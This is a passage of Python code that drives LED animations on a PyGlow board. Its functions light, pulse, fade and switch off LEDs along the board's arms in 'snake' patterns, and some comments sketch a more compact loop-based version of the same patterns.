# Fade Head and Body 1 - 10
PYGLOW.led(13, 10)
sleep(sleep_speed)
PYGLOW.led(14, 20)
sleep(sleep_speed)
PYGLOW.led(15, 30)
sleep(sleep_speed)
PYGLOW.led(16, 40)
sleep(sleep_speed)
PYGLOW.led(17, 50)
sleep(sleep_speed)
PYGLOW.led(18, 60)
sleep(sleep_speed)
PYGLOW.led(12, 70)
sleep(sleep_speed)
PYGLOW.led(5, 80)
sleep(sleep_speed)
PYGLOW.led(4, 90)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 110)
sleep(sleep_speed)
# Fade Head, Body 1 - 10, and Tail
PYGLOW.led(13, 0)
sleep(sleep_speed)
PYGLOW.led(14, 10)
sleep(sleep_speed)
PYGLOW.led(15, 20)
sleep(sleep_speed)
PYGLOW.led(16, 30)
sleep(sleep_speed)
PYGLOW.led(17, 40)
sleep(sleep_speed)
PYGLOW.led(18, 50)
sleep(sleep_speed)
PYGLOW.led(12, 60)
sleep(sleep_speed)
PYGLOW.led(5, 70)
sleep(sleep_speed)
PYGLOW.led(4, 80)
sleep(sleep_speed)
PYGLOW.led(3, 90)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 110)
sleep(sleep_speed)
# Fade Body 1 - 10 and Tail
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(15, 10)
sleep(sleep_speed)
PYGLOW.led(16, 20)
sleep(sleep_speed)
PYGLOW.led(17, 30)
sleep(sleep_speed)
PYGLOW.led(18, 40)
sleep(sleep_speed)
PYGLOW.led(12, 50)
sleep(sleep_speed)
PYGLOW.led(5, 60)
sleep(sleep_speed)
PYGLOW.led(4, 70)
sleep(sleep_speed)
PYGLOW.led(3, 80)
sleep(sleep_speed)
PYGLOW.led(2, 90)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Fade Body 2 - 10 and Tail
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(16, 10)
sleep(sleep_speed)
PYGLOW.led(17, 20)
sleep(sleep_speed)
PYGLOW.led(18, 30)
sleep(sleep_speed)
PYGLOW.led(12, 40)
sleep(sleep_speed)
PYGLOW.led(5, 50)
sleep(sleep_speed)
PYGLOW.led(4, 60)
sleep(sleep_speed)
PYGLOW.led(3, 70)
sleep(sleep_speed)
PYGLOW.led(2, 80)
sleep(sleep_speed)
PYGLOW.led(1, 90)
sleep(sleep_speed)
# Fade Body 3 - 10 and Tail
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(17, 10)
sleep(sleep_speed)
PYGLOW.led(18, 20)
sleep(sleep_speed)
PYGLOW.led(12, 30)
sleep(sleep_speed)
PYGLOW.led(5, 40)
sleep(sleep_speed)
PYGLOW.led(4, 50)
sleep(sleep_speed)
PYGLOW.led(3, 60)
sleep(sleep_speed)
PYGLOW.led(2, 70)
sleep(sleep_speed)
PYGLOW.led(1, 80)
sleep(sleep_speed)
# Fade Body 4 - 10 and Tail
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(18, 10)
sleep(sleep_speed)
PYGLOW.led(12, 20)
sleep(sleep_speed)
PYGLOW.led(5, 30)
sleep(sleep_speed)
PYGLOW.led(4, 40)
sleep(sleep_speed)
PYGLOW.led(3, 50)
sleep(sleep_speed)
PYGLOW.led(2, 60)
sleep(sleep_speed)
PYGLOW.led(1, 70)
sleep(sleep_speed)
# Fade Body 5 - 10 and Tail
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(12, 10)
sleep(sleep_speed)
PYGLOW.led(5, 20)
sleep(sleep_speed)
PYGLOW.led(4, 30)
sleep(sleep_speed)
PYGLOW.led(3, 40)
sleep(sleep_speed)
PYGLOW.led(2, 50)
sleep(sleep_speed)
PYGLOW.led(1, 60)
sleep(sleep_speed)
# Fade Body 6 - 10 and Tail
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(5, 10)
sleep(sleep_speed)
PYGLOW.led(4, 20)
sleep(sleep_speed)
PYGLOW.led(3, 30)
sleep(sleep_speed)
PYGLOW.led(2, 40)
sleep(sleep_speed)
PYGLOW.led(1, 50)
sleep(sleep_speed)
# Fade Body 7 - 10 and Tail
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(4, 10)
sleep(sleep_speed)
PYGLOW.led(3, 20)
sleep(sleep_speed)
PYGLOW.led(2, 30)
sleep(sleep_speed)
PYGLOW.led(1, 40)
sleep(sleep_speed)
# Fade Body 8 - 10 and Tail
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(3, 10)
sleep(sleep_speed)
PYGLOW.led(2, 20)
sleep(sleep_speed)
PYGLOW.led(1, 30)
sleep(sleep_speed)
# Fade Body 9 - 10 and Tail
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(2, 10)
sleep(sleep_speed)
PYGLOW.led(1, 20)
sleep(sleep_speed)
# Fade Body 10 and Tail
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(1, 10)
sleep(sleep_speed)
# Fade Tail
PYGLOW.led(1, 0)
sleep(sleep_speed)
def slithering_fading_snake_32():
"""
Lights up then fades the LEDs on arms 3 and 2
"""
LOGGER.debug("SLITHERING FADING SNAKE 32")
sleep_speed = 0.01
# Turn on Snake Head
PYGLOW.led(13, 120)
sleep(sleep_speed)
# Turn on Body 1
PYGLOW.led(14, 120)
sleep(sleep_speed)
# Fade Head
PYGLOW.led(13, 110)
sleep(sleep_speed)
# Turn on Body 2
PYGLOW.led(15, 120)
sleep(sleep_speed)
# Fade Head and Body 1
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 110)
sleep(sleep_speed)
# Turn on Body 3
PYGLOW.led(16, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 2
PYGLOW.led(13, 90)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 110)
sleep(sleep_speed)
# Turn on Body 4
PYGLOW.led(17, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 3
PYGLOW.led(13, 80)
sleep(sleep_speed)
PYGLOW.led(14, 90)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 110)
sleep(sleep_speed)
# Turn on Body 5
PYGLOW.led(6, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 4
PYGLOW.led(13, 70)
sleep(sleep_speed)
PYGLOW.led(14, 80)
sleep(sleep_speed)
PYGLOW.led(15, 90)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 110)
sleep(sleep_speed)
# Turn on Body 6
PYGLOW.led(12, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 5
PYGLOW.led(13, 60)
sleep(sleep_speed)
PYGLOW.led(14, 70)
sleep(sleep_speed)
PYGLOW.led(15, 80)
sleep(sleep_speed)
PYGLOW.led(16, 90)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(6, 110)
sleep(sleep_speed)
# Turn on Body 7
PYGLOW.led(11, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 6
PYGLOW.led(13, 50)
sleep(sleep_speed)
PYGLOW.led(14, 60)
sleep(sleep_speed)
PYGLOW.led(15, 70)
sleep(sleep_speed)
PYGLOW.led(16, 80)
sleep(sleep_speed)
PYGLOW.led(17, 90)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(12, 110)
sleep(sleep_speed)
# Turn on Body 8
PYGLOW.led(10, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 7
PYGLOW.led(13, 40)
sleep(sleep_speed)
PYGLOW.led(14, 50)
sleep(sleep_speed)
PYGLOW.led(15, 60)
sleep(sleep_speed)
PYGLOW.led(16, 70)
sleep(sleep_speed)
PYGLOW.led(17, 80)
sleep(sleep_speed)
PYGLOW.led(6, 90)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(11, 110)
sleep(sleep_speed)
# Turn on Body 9
PYGLOW.led(9, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 8
PYGLOW.led(13, 30)
sleep(sleep_speed)
PYGLOW.led(14, 40)
sleep(sleep_speed)
PYGLOW.led(15, 50)
sleep(sleep_speed)
PYGLOW.led(16, 60)
sleep(sleep_speed)
PYGLOW.led(17, 70)
sleep(sleep_speed)
PYGLOW.led(6, 80)
sleep(sleep_speed)
PYGLOW.led(12, 90)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 110)
sleep(sleep_speed)
# Turn on Body 10
PYGLOW.led(8, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 9
PYGLOW.led(13, 20)
sleep(sleep_speed)
PYGLOW.led(14, 30)
sleep(sleep_speed)
PYGLOW.led(15, 40)
sleep(sleep_speed)
PYGLOW.led(16, 50)
sleep(sleep_speed)
PYGLOW.led(17, 60)
sleep(sleep_speed)
PYGLOW.led(6, 70)
sleep(sleep_speed)
PYGLOW.led(12, 80)
sleep(sleep_speed)
PYGLOW.led(11, 90)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 110)
sleep(sleep_speed)
# Turn on Tail
PYGLOW.led(7, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 10
PYGLOW.led(13, 10)
sleep(sleep_speed)
PYGLOW.led(14, 20)
sleep(sleep_speed)
PYGLOW.led(15, 30)
sleep(sleep_speed)
PYGLOW.led(16, 40)
sleep(sleep_speed)
PYGLOW.led(17, 50)
sleep(sleep_speed)
PYGLOW.led(6, 60)
sleep(sleep_speed)
PYGLOW.led(12, 70)
sleep(sleep_speed)
PYGLOW.led(11, 80)
sleep(sleep_speed)
PYGLOW.led(10, 90)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 110)
sleep(sleep_speed)
# Fade Head, Body 1 - 10, and Tail
PYGLOW.led(13, 0)
sleep(sleep_speed)
PYGLOW.led(14, 10)
sleep(sleep_speed)
PYGLOW.led(15, 20)
sleep(sleep_speed)
PYGLOW.led(16, 30)
sleep(sleep_speed)
PYGLOW.led(17, 40)
sleep(sleep_speed)
PYGLOW.led(6, 50)
sleep(sleep_speed)
PYGLOW.led(12, 60)
sleep(sleep_speed)
PYGLOW.led(11, 70)
sleep(sleep_speed)
PYGLOW.led(10, 80)
sleep(sleep_speed)
PYGLOW.led(9, 90)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 110)
sleep(sleep_speed)
# Fade Body 1 - 10 and Tail
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(15, 10)
sleep(sleep_speed)
PYGLOW.led(16, 20)
sleep(sleep_speed)
PYGLOW.led(17, 30)
sleep(sleep_speed)
PYGLOW.led(6, 40)
sleep(sleep_speed)
PYGLOW.led(12, 50)
sleep(sleep_speed)
PYGLOW.led(11, 60)
sleep(sleep_speed)
PYGLOW.led(10, 70)
sleep(sleep_speed)
PYGLOW.led(9, 80)
sleep(sleep_speed)
PYGLOW.led(8, 90)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Fade Body 2 - 10 and Tail
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(16, 10)
sleep(sleep_speed)
PYGLOW.led(17, 20)
sleep(sleep_speed)
PYGLOW.led(6, 30)
sleep(sleep_speed)
PYGLOW.led(12, 40)
sleep(sleep_speed)
PYGLOW.led(11, 50)
sleep(sleep_speed)
PYGLOW.led(10, 60)
sleep(sleep_speed)
PYGLOW.led(9, 70)
sleep(sleep_speed)
PYGLOW.led(8, 80)
sleep(sleep_speed)
PYGLOW.led(7, 90)
sleep(sleep_speed)
# Fade Body 3 - 10 and Tail
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(17, 10)
sleep(sleep_speed)
PYGLOW.led(6, 20)
sleep(sleep_speed)
PYGLOW.led(12, 30)
sleep(sleep_speed)
PYGLOW.led(11, 40)
sleep(sleep_speed)
PYGLOW.led(10, 50)
sleep(sleep_speed)
PYGLOW.led(9, 60)
sleep(sleep_speed)
PYGLOW.led(8, 70)
sleep(sleep_speed)
PYGLOW.led(7, 80)
sleep(sleep_speed)
# Fade Body 4 - 10 and Tail
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(6, 10)
sleep(sleep_speed)
PYGLOW.led(12, 20)
sleep(sleep_speed)
PYGLOW.led(11, 30)
sleep(sleep_speed)
PYGLOW.led(10, 40)
sleep(sleep_speed)
PYGLOW.led(9, 50)
sleep(sleep_speed)
PYGLOW.led(8, 60)
sleep(sleep_speed)
PYGLOW.led(7, 70)
sleep(sleep_speed)
# Fade Body 5 - 10 and Tail
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(12, 10)
sleep(sleep_speed)
PYGLOW.led(11, 20)
sleep(sleep_speed)
PYGLOW.led(10, 30)
sleep(sleep_speed)
PYGLOW.led(9, 40)
sleep(sleep_speed)
PYGLOW.led(8, 50)
sleep(sleep_speed)
PYGLOW.led(7, 60)
sleep(sleep_speed)
# Fade Body 6 - 10 and Tail
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(11, 10)
sleep(sleep_speed)
PYGLOW.led(10, 20)
sleep(sleep_speed)
PYGLOW.led(9, 30)
sleep(sleep_speed)
PYGLOW.led(8, 40)
sleep(sleep_speed)
PYGLOW.led(7, 50)
sleep(sleep_speed)
# Fade Body 7 - 10 and Tail
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(10, 10)
sleep(sleep_speed)
PYGLOW.led(9, 20)
sleep(sleep_speed)
PYGLOW.led(8, 30)
sleep(sleep_speed)
PYGLOW.led(7, 40)
sleep(sleep_speed)
# Fade Body 8 - 10 and Tail
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(9, 10)
sleep(sleep_speed)
PYGLOW.led(8, 20)
sleep(sleep_speed)
PYGLOW.led(7, 30)
sleep(sleep_speed)
# Fade Body 9 - 10 and Tail
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(8, 10)
sleep(sleep_speed)
PYGLOW.led(7, 20)
sleep(sleep_speed)
# Fade Body 10 and Tail
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(7, 10)
sleep(sleep_speed)
# Fade Tail
PYGLOW.led(7, 0)
sleep(sleep_speed)
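# The slithering/fading sequences above all unroll the same pattern: walk
# an ordered list of LEDs, lighting each at full brightness while dimming
# everything behind it, then fade the whole body out head-first. A
# hypothetical table-driven sketch of that pattern (the `set_led` and
# `pause` callables are assumptions standing in for PYGLOW.led and a
# sleep(sleep_speed) wrapper; they are not part of the original API):
def fade_snake(set_led, pause, leds, peak=120, step=10):
    """Sketch: light then fade `leds` in order, as the functions above do."""
    count = len(leds)
    # Slither in: light each LED, then dim every LED behind it one step.
    for head in range(count):
        set_led(leds[head], peak)
        pause()
        for body in range(head):
            set_led(leds[body], peak - step * (head - body))
            pause()
    # Fade out: the head reaches 0 first, the tail last.
    for off in range(count):
        set_led(leds[off], 0)
        pause()
        for body in range(off + 1, count):
            set_led(leds[body], step * (body - off))
            pause()
# Under these assumptions,
# fade_snake(PYGLOW.led, lambda: sleep(0.01), [13, 14, 15, 16, 17, 18, 12, 5, 4, 3, 2, 1])
# should reproduce the call sequence of slithering_fading_snake_31 above.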
def pulsing_snake_12():
"""
Lights up and pulses the LEDs on arms 1 and 2
"""
LOGGER.debug("PULSING SNAKE 12")
# Start pulse speed at 125, end at 100, decrease by 1
for i in range(125, 99, -1):
LOGGER.debug("Pulse speed is: %s", i)
PYGLOW.set_leds(SNAKE_12_LEDS, 100, speed=i, pulse=True)
sleep(0)
PYGLOW.update_leds()
PYGLOW.set_leds(SNAKE_12_LEDS, 0)
PYGLOW.update_leds()
sleep(1)
def pulsing_snake_13():
"""
Lights up and pulses the LEDs on arms 1 and 3
"""
LOGGER.debug("PULSING SNAKE 13")
# Start pulse speed at 125, end at 100, decrease by 1
for i in range(125, 99, -1):
LOGGER.debug("Pulse speed is: %s", i)
PYGLOW.set_leds(SNAKE_13_LEDS, 100, speed=i, pulse=True)
sleep(0)
PYGLOW.update_leds()
PYGLOW.set_leds(SNAKE_13_LEDS, 0)
PYGLOW.update_leds()
sleep(1)
def pulsing_snake_23():
"""
Lights up and pulses the LEDs on arms 2 and 3
"""
LOGGER.debug("PULSING SNAKE 23")
# Start pulse speed at 125, end at 100, decrease by 1
for i in range(125, 99, -1):
LOGGER.debug("Pulse speed is: %s", i)
PYGLOW.set_leds(SNAKE_23_LEDS, 100, speed=i, pulse=True)
sleep(0)
PYGLOW.update_leds()
PYGLOW.set_leds(SNAKE_23_LEDS, 0)
PYGLOW.update_leds()
sleep(1)
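# The three pulsing_snake_* functions above differ only in which LED list
# they sweep. A sketch of the shared sweep, with the PyGlow calls injected
# as callables (`set_leds`, `update` and `pause` stand in for
# PYGLOW.set_leds, PYGLOW.update_leds and sleep; the speed/pulse keyword
# signature is assumed from the calls above, not verified):
def pulse_sweep(set_leds, update, pause, leds, start=125, stop=100):
    """Sketch: sweep the pulse speed from `start` down to `stop`, then clear."""
    for speed in range(start, stop - 1, -1):
        set_leds(leds, 100, speed=speed, pulse=True)
        pause()
        update()
    set_leds(leds, 0)  # switch the snake off once the sweep finishes
    update()
# Under these assumptions,
# pulse_sweep(PYGLOW.set_leds, PYGLOW.update_leds, lambda: sleep(0), SNAKE_12_LEDS)
# would match pulsing_snake_12 apart from the trailing sleep(1).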
def exploding_snake_12():
"""
Pulses then turns off the LEDs on arms 1 and 2
"""
LOGGER.debug("Exploding Snake 12...")
explode_speed = 0.020
# Pulse
pulse_snake_12_or_21()
# Explode Snake 12
PYGLOW.led(6, 0)
sleep(explode_speed)
PYGLOW.led(18, 0)
sleep(explode_speed)
PYGLOW.led(11, 0)
sleep(explode_speed)
PYGLOW.led(5, 0)
sleep(explode_speed)
PYGLOW.led(10, 0)
sleep(explode_speed)
PYGLOW.led(4, 0)
sleep(explode_speed)
PYGLOW.led(9, 0)
sleep(explode_speed)
PYGLOW.led(3, 0)
sleep(explode_speed)
PYGLOW.led(8, 0)
sleep(explode_speed)
PYGLOW.led(2, 0)
sleep(explode_speed)
PYGLOW.led(7, 0)
sleep(explode_speed)
PYGLOW.led(1, 0)
sleep(explode_speed)
def exploding_snake_13():
"""
Pulses then turns off the LEDs on arms 1 and 3
"""
LOGGER.debug("Exploding Snake 13...")
explode_speed = 0.020
# Pulse
pulse_snake_13_or_31()
# Explode Snake 13
PYGLOW.led(18, 0)
sleep(explode_speed)
PYGLOW.led(12, 0)
sleep(explode_speed)
PYGLOW.led(17, 0)
sleep(explode_speed)
PYGLOW.led(5, 0)
sleep(explode_speed)
PYGLOW.led(16, 0)
sleep(explode_speed)
PYGLOW.led(4, 0)
sleep(explode_speed)
PYGLOW.led(15, 0)
sleep(explode_speed)
PYGLOW.led(3, 0)
sleep(explode_speed)
PYGLOW.led(14, 0)
sleep(explode_speed)
PYGLOW.led(2, 0)
sleep(explode_speed)
PYGLOW.led(13, 0)
sleep(explode_speed)
PYGLOW.led(1, 0)
sleep(explode_speed)
def exploding_snake_23():
"""
Pulses then turns off the LEDs on arms 2 and 3
"""
LOGGER.debug("Exploding Snake 23...")
explode_speed = 0.020
# Pulse
pulse_snake_23_or_32()
# Explode Snake 23
PYGLOW.led(6, 0)
sleep(explode_speed)
PYGLOW.led(12, 0)
sleep(explode_speed)
PYGLOW.led(11, 0)
sleep(explode_speed)
PYGLOW.led(17, 0)
sleep(explode_speed)
PYGLOW.led(10, 0)
sleep(explode_speed)
PYGLOW.led(16, 0)
sleep(explode_speed)
PYGLOW.led(9, 0)
sleep(explode_speed)
PYGLOW.led(15, 0)
sleep(explode_speed)
PYGLOW.led(8, 0)
sleep(explode_speed)
PYGLOW.led(14, 0)
sleep(explode_speed)
PYGLOW.led(7, 0)
sleep(explode_speed)
PYGLOW.led(13, 0)
sleep(explode_speed)
def slithering_exploding_snake_12():
"""
Lights up, pulses, then turns off the LEDs on arms 1 and 2
"""
LOGGER.debug("Snake 12 is slithering...")
sleep_speed = 0.10
# Light up Snake 12
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_12_or_21()
# Explode Snake 12
LOGGER.debug("Snake 12 is exploding...")
explode_snake_12_or_21()
def slithering_exploding_snake_13():
"""
Lights up, pulses, then turns off the LEDs on arms 1 and 3
"""
LOGGER.debug("Snake 13 is slithering...")
sleep_speed = 0.10
# Light up Snake 13
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_13_or_31()
# Explode Snake 13
LOGGER.debug("Snake 13 is exploding...")
explode_snake_13_or_31()
def slithering_exploding_snake_21():
"""
Lights up, pulses, then turns off the LEDs on arms 2 and 1
"""
LOGGER.debug("Snake 21 is slithering...")
sleep_speed = 0.10
# Light up Snake 21
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_12_or_21()
# Explode Snake 21
LOGGER.debug("Snake 21 is exploding...")
explode_snake_12_or_21()
def slithering_exploding_snake_23():
"""
Lights up, pulses, then turns off the LEDs on arms 2 and 3
"""
LOGGER.debug("Snake 23 is slithering...")
sleep_speed = 0.10
# Light up Snake 23
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_23_or_32()
# Explode Snake 23
LOGGER.debug("Snake 23 is exploding...")
explode_snake_23_or_32()
def slithering_exploding_snake_31():
"""
Lights up, pulses, then turns off the LEDs on arms 3 and 1
"""
LOGGER.debug("Snake 31 is slithering...")
sleep_speed = 0.10
# Light up Snake 31
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_13_or_31()
# Explode Snake 31
LOGGER.debug("Snake 31 is exploding...")
explode_snake_13_or_31()
def slithering_exploding_snake_32():
"""
Lights up, pulses, then turns off the LEDs on arms 3 and 2
"""
LOGGER.debug("Snake 32 is slithering...")
sleep_speed = 0.10
# Light up Snake 32
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_23_or_32()
# Explode Snake 32
LOGGER.debug("Snake 32 is exploding...")
explode_snake_23_or_32()
def pulse_snake_12_or_21():
"""
Lights up and pulses the LEDs on arms 1 and 2
"""
LOGGER.debug("Snake is pulsing.")
# Start pulse speed at 175, end at 225, increase by 1
for i in range(175, 226, 1):
LOGGER.debug("Pulse speed is: %s", i)
PYGLOW.set_leds(SNAKE_12_LEDS, 100, speed=i, pulse=True)
sleep(0)
PYGLOW.update_leds()
PYGLOW.set_leds(SNAKE_12_LEDS, 100)
PYGLOW.update_leds()
sleep(1)
def pulse_snake_13_or_31():
"""
Lights up and pulses the LEDs on arms 1 and 3
"""
LOGGER.debug("Snake is pulsing.")
# Start pulse speed at 175, end at 225, increase by 1
for i in range(175, 226, 1):
LOGGER.debug("Pulse speed is: %s", i)
PYGLOW.set_leds(SNAKE_13_LEDS, 100, speed=i, pulse=True)
sleep(0)
PYGLOW.update_leds()
PYGLOW.set_leds(SNAKE_13_LEDS, 100)
PYGLOW.update_leds()
sleep(1)
def pulse_snake_23_or_32():
"""
Lights up and pulses the LEDs on arms 2 and 3
"""
LOGGER.debug("Snake is pulsing.")
# Start pulse speed at 175, end at 225, increase by 1
for i in range(175, 226, 1):
LOGGER.debug("Pulse speed is: %s", i)
PYGLOW.set_leds(SNAKE_23_LEDS, 100, speed=i, pulse=True)
sleep(0)
PYGLOW.update_leds()
PYGLOW.set_leds(SNAKE_23_LEDS, 100)
PYGLOW.update_leds()
sleep(1)
def explode_snake_12_or_21():
"""
Turns off the LEDs on arms 1 and 2, centre outward
"""
explode_speed = 0.015
# Explode snake 12 or 21
PYGLOW.led(18, 0)
sleep(explode_speed)
PYGLOW.led(6, 0)
sleep(explode_speed)
PYGLOW.led(11, 0)
sleep(explode_speed)
PYGLOW.led(5, 0)
sleep(explode_speed)
PYGLOW.led(10, 0)
sleep(explode_speed)
PYGLOW.led(4, 0)
sleep(explode_speed)
PYGLOW.led(9, 0)
sleep(explode_speed)
PYGLOW.led(3, 0)
sleep(explode_speed)
PYGLOW.led(8, 0)
sleep(explode_speed)
PYGLOW.led(2, 0)
sleep(explode_speed)
PYGLOW.led(7, 0)
sleep(explode_speed)
PYGLOW.led(1, 0)
def explode_snake_13_or_31():
"""
Turns off the LEDs on arms 1 and 3, centre outward
"""
explode_speed = 0.020
# Explode snake 13 or 31
PYGLOW.led(18, 0)
sleep(explode_speed)
PYGLOW.led(12, 0)
sleep(explode_speed)
PYGLOW.led(17, 0)
sleep(explode_speed)
PYGLOW.led(5, 0)
sleep(explode_speed)
PYGLOW.led(16, 0)
sleep(explode_speed)
PYGLOW.led(4, 0)
sleep(explode_speed)
PYGLOW.led(15, 0)
sleep(explode_speed)
PYGLOW.led(3, 0)
sleep(explode_speed)
PYGLOW.led(14, 0)
sleep(explode_speed)
PYGLOW.led(2, 0)
sleep(explode_speed)
PYGLOW.led(13, 0)
sleep(explode_speed)
PYGLOW.led(1, 0)
def explode_snake_23_or_32():
"""
Turns off the LEDs on arms 2 and 3, centre outward
"""
explode_speed = 0.020
# Explode snake 23 or 32
PYGLOW.led(12, 0)
sleep(explode_speed)
PYGLOW.led(6, 0)
sleep(explode_speed)
PYGLOW.led(17, 0)
sleep(explode_speed)
PYGLOW.led(11, 0)
sleep(explode_speed)
PYGLOW.led(16, 0)
sleep(explode_speed)
PYGLOW.led(10, 0)
sleep(explode_speed)
PYGLOW.led(15, 0)
sleep(explode_speed)
PYGLOW.led(9, 0)
sleep(explode_speed)
PYGLOW.led(14, 0)
sleep(explode_speed)
PYGLOW.led(8, 0)
sleep(explode_speed)
PYGLOW.led(13, 0)
sleep(explode_speed)
PYGLOW.led(7, 0)
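# Each explode_snake_* helper above switches two six-LED arms off from the
# centre outward, alternating between the arms. A hypothetical sketch of
# that pattern (`set_led` and `pause` are assumptions standing in for
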